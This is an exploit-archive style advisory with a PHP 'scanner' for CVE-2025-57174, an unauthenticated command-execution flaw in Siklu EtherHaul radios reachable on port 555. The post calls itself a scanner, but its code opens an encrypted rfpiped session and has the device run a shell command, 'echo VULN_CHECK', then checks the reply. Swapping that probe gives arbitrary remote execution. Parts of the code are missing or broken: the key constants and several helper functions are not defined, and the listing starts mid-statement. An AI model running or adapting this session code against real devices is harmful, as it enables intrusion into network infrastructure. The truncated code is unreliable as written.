============================================================================================================================================= | # Title : Siklu EtherHaul EH-8010 / EH-1200 Vulnerability Scanner | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) | | # Vendor : https://www.ceragon.com/products/siklu-by-ceragon | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/214068/ & CVE-2025-57174 [+] Summary : This PHP-based scanner safely detects an unauthenticated remote command execution vulnerability in Siklu EtherHaul devices by sending a non-destructive encrypted probe command and validating the response. The scanner does not alter device state and is suitable for large-scale assessments. [+] Impact: Successful detection confirms full unauthenticated RCE exposure. [+] Mitigation: - Restrict TCP port 555 - Disable rfpiped service - Update firmware [+] POC: php poc.php 192.168.1.10 key = $key; $this->send_iv = $iv; $this->recv_iv = $iv; } function enc_send($sock, $data) { $ct = openssl_encrypt( $data, 'AES-256-CBC', $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $this->send_iv ); $this->send_iv = substr($ct, -16); @socket_write($sock, $ct); } function recv_header($sock) { $ct = recv_exact($sock, HDR_LEN); if ($ct === false) return false; $pt = openssl_decrypt( $ct, 'AES-256-CBC', $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $this->recv_iv ); $this->recv_iv = substr($ct, -16); return $pt; } function dec_recv($sock, $len) { $padded = ($len + 15) & ~15; $ct = recv_exact($sock, $padded); if ($ct === false) return false; $pt = openssl_decrypt( $ct, 'AES-256-CBC', $this->key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $this->recv_iv ); $this->recv_iv = substr($ct, -16); return substr($pt, 0, $len); } } if ($argc < 2) { echo "Usage: php siklu_eh_scanner.php \n"; exit; } $target = $argv[1]; $probe = "echo VULN_CHECK\x00"; $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if (!@socket_connect($sock, $target, PORT)) { echo "[!] Connection failed\n"; exit; } $sess = new RFPipeSession($KEY, $IV0); $hdr = build_header(0x00, 0x01, strlen($probe)); $sess->enc_send($sock, $hdr); $sess->enc_send($sock, pad16_zero($probe)); $resp_hdr = $sess->recv_header($sock); if ($resp_hdr === false) { echo "[?] No response (filtered or patched)\n"; exit; } $len = unpack('V', substr($resp_hdr, 0x08, 4))[1]; if ($len <= 0) { echo "[-] Not Vulnerable\n"; exit; } $data = $sess->dec_recv($sock, $len); if ($data !== false && strpos($data, 'VULN_CHECK') !== false) { echo "[+] VULNERABLE: Unauthenticated RCE detected\n"; } else { echo "[-] Not Vulnerable\n"; } socket_close($sock); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================